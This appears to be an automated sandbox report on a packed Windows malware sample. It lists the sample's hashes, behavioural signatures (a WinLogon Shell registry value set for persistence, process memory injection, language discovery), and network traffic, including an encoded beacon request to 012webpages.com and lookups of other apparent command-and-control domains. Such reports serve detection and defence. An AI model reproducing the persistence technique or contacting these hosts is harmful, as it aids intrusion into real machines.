Analysis
-
max time kernel
141s -
max time network
128s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
21-09-2024 00:42
Static task
static1
Behavioral task
behavioral1
Sample
eec01efbbe0b7fda3816af7957024ff9_JaffaCakes118.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
eec01efbbe0b7fda3816af7957024ff9_JaffaCakes118.exe
Resource
win10v2004-20240802-en
General
-
Target
eec01efbbe0b7fda3816af7957024ff9_JaffaCakes118.exe
-
Size
162KB
-
MD5
eec01efbbe0b7fda3816af7957024ff9
-
SHA1
63270a6182ba640a5cb6141fc6daabea1e2c1959
-
SHA256
45b2c7845f0ec06024b00543bbd17c008989a1361cdc50e7de40370232b9b628
-
SHA512
d87cb29262d710e25aba7d782ba0917882daf92810f1cf73b27600b39c25e951cb5978d59a419b237b756dbfbc0f05fa0a185f7b5876d7a52bec5f70d8cf15f5
-
SSDEEP
3072:kkqseZj6FzYj+A3FBlLzhMgJCyNZn5g8JEfqcS+vhsP75w28NHSqstaEVG:v8j6FzY/RLzpNZn5gPq5+OPtwufta
Malware Config
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,C:\\Users\\Admin\\AppData\\Roaming\\50593\\C7061.exe" eec01efbbe0b7fda3816af7957024ff9_JaffaCakes118.exe -
resource yara_rule behavioral2/memory/4924-2-0x0000000000400000-0x0000000000491000-memory.dmp upx behavioral2/memory/3084-13-0x0000000000400000-0x0000000000491000-memory.dmp upx behavioral2/memory/3084-15-0x0000000000400000-0x0000000000491000-memory.dmp upx behavioral2/memory/4924-16-0x0000000000400000-0x0000000000491000-memory.dmp upx behavioral2/memory/4924-17-0x0000000000400000-0x000000000048E000-memory.dmp upx behavioral2/memory/1272-84-0x0000000000400000-0x0000000000491000-memory.dmp upx behavioral2/memory/1272-86-0x0000000000400000-0x0000000000491000-memory.dmp upx behavioral2/memory/4924-87-0x0000000000400000-0x0000000000491000-memory.dmp upx behavioral2/memory/4924-179-0x0000000000400000-0x0000000000491000-memory.dmp upx -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language eec01efbbe0b7fda3816af7957024ff9_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language eec01efbbe0b7fda3816af7957024ff9_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language eec01efbbe0b7fda3816af7957024ff9_JaffaCakes118.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 4924 wrote to memory of 3084 4924 eec01efbbe0b7fda3816af7957024ff9_JaffaCakes118.exe 94 PID 4924 wrote to memory of 3084 4924 eec01efbbe0b7fda3816af7957024ff9_JaffaCakes118.exe 94 PID 4924 wrote to memory of 3084 4924 eec01efbbe0b7fda3816af7957024ff9_JaffaCakes118.exe 94 PID 4924 wrote to memory of 1272 4924 eec01efbbe0b7fda3816af7957024ff9_JaffaCakes118.exe 98 PID 4924 wrote to memory of 1272 4924 eec01efbbe0b7fda3816af7957024ff9_JaffaCakes118.exe 98 PID 4924 wrote to memory of 1272 4924 eec01efbbe0b7fda3816af7957024ff9_JaffaCakes118.exe 98
Processes
-
C:\Users\Admin\AppData\Local\Temp\eec01efbbe0b7fda3816af7957024ff9_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\eec01efbbe0b7fda3816af7957024ff9_JaffaCakes118.exe"1⤵
- Modifies WinLogon for persistence
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4924 -
C:\Users\Admin\AppData\Local\Temp\eec01efbbe0b7fda3816af7957024ff9_JaffaCakes118.exeC:\Users\Admin\AppData\Local\Temp\eec01efbbe0b7fda3816af7957024ff9_JaffaCakes118.exe startC:\Program Files (x86)\LP\6105\473.exe%C:\Program Files (x86)\LP\61052⤵
- System Location Discovery: System Language Discovery
PID:3084
-
-
C:\Users\Admin\AppData\Local\Temp\eec01efbbe0b7fda3816af7957024ff9_JaffaCakes118.exeC:\Users\Admin\AppData\Local\Temp\eec01efbbe0b7fda3816af7957024ff9_JaffaCakes118.exe startC:\Program Files (x86)\93ADD\lvvm.exe%C:\Program Files (x86)\93ADD2⤵
- System Location Discovery: System Language Discovery
PID:1272
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4344,i,11391966286255097843,10588851088187498028,262144 --variations-seed-version --mojo-platform-channel-handle=3904 /prefetch:81⤵PID:1140
Network
-
Remote address:8.8.8.8:53Request8.8.8.8.in-addr.arpaIN PTRResponse8.8.8.8.in-addr.arpaIN PTRdnsgoogle
-
Remote address:8.8.8.8:53Request209.205.72.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request79.190.18.2.in-addr.arpaIN PTRResponse79.190.18.2.in-addr.arpaIN PTRa2-18-190-79deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request69.31.126.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request95.221.229.192.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request012webpages.comIN AResponse012webpages.comIN A103.27.200.238
-
GEThttp://012webpages.com/christian14.jpg?pr=gHZutDyMv5rJfCG1J8K%2B1MWCJbP4lltXIA%3D%3Deec01efbbe0b7fda3816af7957024ff9_JaffaCakes118.exeRemote address:103.27.200.238:80RequestGET /christian14.jpg?pr=gHZutDyMv5rJfCG1J8K%2B1MWCJbP4lltXIA%3D%3D HTTP/1.0
Connection: close
Host: 012webpages.com
Accept: */*
User-Agent: chrome/9.0
ResponseHTTP/1.1 301 Moved Permanently
Content-Type: text/html
Content-Length: 166
Connection: close
Location: http://www.012webpages.com/christian14.jpg?pr=gHZutDyMv5rJfCG1J8K%2B1MWCJbP4lltXIA%3D%3D
Server: Nginx_Rc-Cr
etag: on
-
Remote address:8.8.8.8:53Request238.200.27.103.in-addr.arpaIN PTRResponse238.200.27.103.in-addr.arpaIN PTRth238ruk-cominth
-
Remote address:8.8.8.8:53Request154.239.44.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestregfeedbackaccess.comIN AResponse
-
Remote address:8.8.8.8:53Requestrenamesys5.comIN AResponse
-
Remote address:8.8.8.8:53Request26.165.165.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request241.42.69.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestrenamesys5.comIN AResponse
-
Remote address:8.8.8.8:53Request19.229.111.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestwww.google.comIN AResponsewww.google.comIN A172.217.169.4
-
Remote address:172.217.169.4:80RequestGET / HTTP/1.0
Connection: close
Host: www.google.com
Accept: */*
ResponseHTTP/1.0 302 Found
x-hallmonitor-challenge: CgwIya24twYQtsmm4QESBMJuDUY
Content-Type: text/html; charset=UTF-8
Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-NkUr1Scfn-L7lHPCotx_tQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
Date: Sat, 21 Sep 2024 00:43:53 GMT
Server: gws
Content-Length: 396
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: AEC=AVYB7cqVOvUMhfgcBaL9I8sVV3_Nv3lkAeXZL-RK95RRyXWkpepz8ugFvCA; expires=Thu, 20-Mar-2025 00:43:53 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
-
Remote address:172.217.169.4:80RequestGET / HTTP/1.1
Connection: close
Pragma: no-cache
Host: www.google.com
ResponseHTTP/1.1 302 Found
x-hallmonitor-challenge: CgsIyq24twYQ3-ToAxIEwm4NRg
Content-Type: text/html; charset=UTF-8
Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-9vyNQxkRdFAeQlg2ahXV9g' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
Date: Sat, 21 Sep 2024 00:43:54 GMT
Server: gws
Content-Length: 396
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: AEC=AVYB7cqjSP8j2uHDSk98fr2GzQBTiDGM1nnz7jNkhp0Crjfe43Or6SUm8g; expires=Thu, 20-Mar-2025 00:43:54 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
Connection: close
-
GEThttp://www.google.com/sorry/index?continue=http://www.google.com/&q=EgTCbg1GGMmtuLcGIjCKz9fCktDJEEfyJPL-x8dYHJHyECOWSgxdR7h8g1fXH61MTuuJjYZhCzQqlVsXrscyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMeec01efbbe0b7fda3816af7957024ff9_JaffaCakes118.exeRemote address:172.217.169.4:80RequestGET /sorry/index?continue=http://www.google.com/&q=EgTCbg1GGMmtuLcGIjCKz9fCktDJEEfyJPL-x8dYHJHyECOWSgxdR7h8g1fXH61MTuuJjYZhCzQqlVsXrscyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
Connection: close
Pragma: no-cache
Host: www.google.com
ResponseHTTP/1.1 429 Too Many Requests
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html
Server: HTTP server (unknown)
Content-Length: 3052
X-XSS-Protection: 0
Connection: close
-
Remote address:8.8.8.8:53Request4.169.217.172.in-addr.arpaIN PTRResponse4.169.217.172.in-addr.arpaIN PTRlhr25s26-in-f41e100net
-
103.27.200.238:80http://012webpages.com/christian14.jpg?pr=gHZutDyMv5rJfCG1J8K%2B1MWCJbP4lltXIA%3D%3Dhttpeec01efbbe0b7fda3816af7957024ff9_JaffaCakes118.exe388 B 641 B 5 5
HTTP Request
GET http://012webpages.com/christian14.jpg?pr=gHZutDyMv5rJfCG1J8K%2B1MWCJbP4lltXIA%3D%3DHTTP Response
301 -
-
302 B 1.5kB 5 5
HTTP Request
GET http://www.google.com/HTTP Response
302 -
-
307 B 1.5kB 5 5
HTTP Request
GET http://www.google.com/HTTP Response
302 -
172.217.169.4:80http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgTCbg1GGMmtuLcGIjCKz9fCktDJEEfyJPL-x8dYHJHyECOWSgxdR7h8g1fXH61MTuuJjYZhCzQqlVsXrscyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMhttpeec01efbbe0b7fda3816af7957024ff9_JaffaCakes118.exe526 B 3.6kB 6 7
HTTP Request
GET http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgTCbg1GGMmtuLcGIjCKz9fCktDJEEfyJPL-x8dYHJHyECOWSgxdR7h8g1fXH61MTuuJjYZhCzQqlVsXrscyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMHTTP Response
429 -
-
-
-
72 B 158 B 1 1
DNS Request
209.205.72.20.in-addr.arpa
-
66 B 90 B 1 1
DNS Request
8.8.8.8.in-addr.arpa
-
70 B 133 B 1 1
DNS Request
79.190.18.2.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
69.31.126.40.in-addr.arpa
-
73 B 144 B 1 1
DNS Request
95.221.229.192.in-addr.arpa
-
61 B 77 B 1 1
DNS Request
012webpages.com
DNS Response
103.27.200.238
-
112 B 2
-
73 B 106 B 1 1
DNS Request
238.200.27.103.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
154.239.44.20.in-addr.arpa
-
67 B 140 B 1 1
DNS Request
regfeedbackaccess.com
-
60 B 133 B 1 1
DNS Request
renamesys5.com
-
72 B 146 B 1 1
DNS Request
26.165.165.52.in-addr.arpa
-
71 B 145 B 1 1
DNS Request
241.42.69.40.in-addr.arpa
-
60 B 133 B 1 1
DNS Request
renamesys5.com
-
72 B 158 B 1 1
DNS Request
19.229.111.52.in-addr.arpa
-
60 B 76 B 1 1
DNS Request
www.google.com
DNS Response
172.217.169.4
-
72 B 110 B 1 1
DNS Request
4.169.217.172.in-addr.arpa
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD50f2c86bae2f5617e0e47a4f8ebbef206
SHA1840379d071f858992d7f3eb9bb3f0ebdaa19519f
SHA256f18df6bfc3c0fe7529af4de64dd6e7324002a79610ab44534df2be17c49b7650
SHA5126e258a80c8a4856a861bc3896680330b5436c5d3707f39e5196385c8f66557a9ed1ec0d241c025e460365fda00afb6ea4f5d57956cb216134946708ba43d0387
-
Filesize
600B
MD524a330fea5149c38c9a854a459b05cd0
SHA1d7a40188cd3a7d4a9e71f273e5d6a786f6e0a253
SHA256fc251b86d0cdf02ec39b4744dd375e7647d90f52a7ccc4b41d1e171e44daa9c6
SHA5123a89e3b0e545f4cc938a3f7ab7766efc9e6ead49f3e54cf84a9569a998be26feb50e4a8cb162f6235dfd301737945c0bb6cf2b5bccdddeb980a3e45cd1e90dca
-
Filesize
996B
MD5c82169b3edcbcf463606fe4ec0e20d89
SHA1fa1b24f38d80c181a2bac5e3f94fd6c368e101aa
SHA256d4dcd80183696a1721f9340cba9d0c5769d263710454961bff2c2e804362f129
SHA512a16ef847c158993717d961bcbc1d0ae38aef85297d47a998fcd964615516016c62bf4de1c1b1b3ac016fad95a6c6fd2248f07bb36bed1bc212d6ac0f4ddde4be